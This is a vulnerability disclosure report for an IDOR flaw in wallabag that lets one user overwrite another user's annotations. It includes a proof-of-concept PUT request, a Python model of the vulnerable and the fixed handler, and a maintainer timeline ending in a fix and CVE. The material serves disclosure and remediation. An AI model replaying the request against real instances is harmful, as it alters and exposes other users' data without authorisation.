IDOR vulnerability allowing to update another user's annotations in wallabag/wallabag

Valid

Reported on

Jan 22nd 2023


Description

An IDOR vulnerability was discovered in wallabag.

Proof of Concept

  1. Login as a victim.
  2. Create an entry and an annotation. In this case the annotation's ID is 3.
  3. Login as an attacker.
  4. Send the following request.

request

PUT /annotations/3 HTTP/1.1
Host: localhost:8000
Cookie: PHPSESSID=e23e2dfc1b530c1884bf17248448b979
Content-Length: 21

{"id":3,"text":"xxx"}

  5. The victim's annotation created in step 2 is updated.

Impact

An attacker can update another user's annotations.
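The following is an added example, not wallabag's own code, that models the flaw in the proof of concept above: a PUT handler that loads the annotation by its numeric ID alone and updates it, beside a hardened handler that scopes the lookup to the requesting user. The store, the handler names and the choice of returning 404 with an empty body on a mismatch are assumptions made for illustration; the empty 404 also addresses the maintainer's point that the response body itself discloses the annotated text.

```python
# Added example (not wallabag code): an in-memory model of the IDOR in the
# PoC and of the owner check that closes it. All names here are assumptions.
from dataclasses import dataclass, field


@dataclass
class Annotation:
    id: int
    user_id: int  # owner of the annotation
    text: str


@dataclass
class Response:
    status: int
    body: dict = field(default_factory=dict)


class AnnotationStore:
    """Stand-in for the annotation table: rows keyed by a global integer id."""

    def __init__(self):
        self._rows = {}
        self._next_id = 1

    def create(self, user_id, text):
        row = Annotation(self._next_id, user_id, text)
        self._rows[row.id] = row
        self._next_id += 1
        return row

    def get(self, annotation_id):
        return self._rows.get(annotation_id)


def put_annotation_vulnerable(store, current_user_id, annotation_id, payload):
    """Looks the row up by id only, so any authenticated user can update any
    annotation. The caller's identity is never compared with the row's owner."""
    row = store.get(annotation_id)
    if row is None:
        return Response(404)
    row.text = payload.get("text", row.text)
    # Echoing the row back also leaks the annotated text to the caller.
    return Response(200, {"id": row.id, "text": row.text})


def put_annotation_fixed(store, current_user_id, annotation_id, payload):
    """Treats the id as valid only within the requesting user's own rows.
    A mismatch is answered exactly like a missing id (404, empty body), so an
    attacker learns neither the text nor whether the id exists at all."""
    row = store.get(annotation_id)
    if row is None or row.user_id != current_user_id:
        return Response(404)
    row.text = payload.get("text", row.text)
    return Response(200, {"id": row.id, "text": row.text})


def reproduce(handler, actor_id=2):
    """Replays the PoC against a handler: user 1 (victim) creates three
    annotations so the target has id 3, then `actor_id` sends
    PUT /annotations/3 with {"id":3,"text":"xxx"}. Returns the response and
    the annotation's text after the request. Data is constructed inline."""
    store = AnnotationStore()
    store.create(1, "first note")
    store.create(1, "second note")
    victim_row = store.create(1, "victim's private note")  # id 3, as in the report
    resp = handler(store, actor_id, victim_row.id, {"id": 3, "text": "xxx"})
    return resp, store.get(victim_row.id).text


if __name__ == "__main__":
    for name, handler in (("vulnerable", put_annotation_vulnerable),
                          ("fixed", put_annotation_fixed)):
        resp, text = reproduce(handler)
        print(f"{name}: attacker got HTTP {resp.status} {resp.body}; "
              f"annotation text is now {text!r}")
```

Run it and the vulnerable handler answers the attacker with 200 and the victim's row now reads "xxx", while the fixed handler answers 404 with no body and leaves the row untouched; the owner (user 1) can still update through the fixed handler. The same ownership check belongs on every per-object route (GET, PUT, DELETE), and scoping the database query by user id rather than checking after the load keeps the check from being forgotten on a new endpoint.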

We are processing your report and will contact the wallabag team within 24 hours. 2 months ago
We have contacted a member of the wallabag team and are waiting to hear back 2 months ago
wallabag/wallabag maintainer has acknowledged this report 2 months ago
Kevin Decherf modified the Severity from Medium (4.3) to Medium (5.4) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Kevin Decherf validated this vulnerability 2 months ago

Changing CVSS score to 5.4 as there is a limited loss of confidentiality. Response from the call returns the annotated text.

bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kevin Decherf marked this as fixed in 2.5.3 with commit 5ac6b6 2 months ago
Kevin Decherf has been awarded the fix bounty
This vulnerability has been assigned a CVE
Kevin Decherf published this vulnerability 2 months ago
wallabag/wallabag maintainer gave praise 2 months ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1